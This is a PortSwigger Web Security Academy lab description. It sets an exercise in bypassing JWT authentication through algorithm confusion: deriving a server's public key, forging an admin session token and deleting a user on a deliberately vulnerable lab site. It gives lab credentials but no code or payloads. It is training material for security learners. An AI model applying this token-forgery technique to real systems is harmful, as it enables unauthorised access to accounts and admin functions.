1. Web Security Academy
  2. JWT attacks
  3. Algorithm confusion attacks
  4. Lab

Lab: JWT authentication bypass via algorithm confusion with no exposed key


This lab uses a JWT-based mechanism for handling sessions. It uses a robust RSA key pair to sign and verify tokens. However, due to implementation flaws, this mechanism is vulnerable to algorithm confusion attacks.

To solve the lab, first obtain the server's public key. Use this key to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter


We recommend familiarizing yourself with how to work with JWTs in Burp Suite before attempting this lab.

We have also provided a simplified version of the jwt_forgery.py tool to help you. For details on how to use this, see Deriving public keys from existing tokens.

Register for free to track your learning progress

The benefits of working through PortSwigger's Web Security Academy
  • Practise exploiting vulnerabilities on realistic targets.

  • Record your progression from Apprentice to Expert.

  • See where you rank in our Hall of Fame.

Already got an account? Login here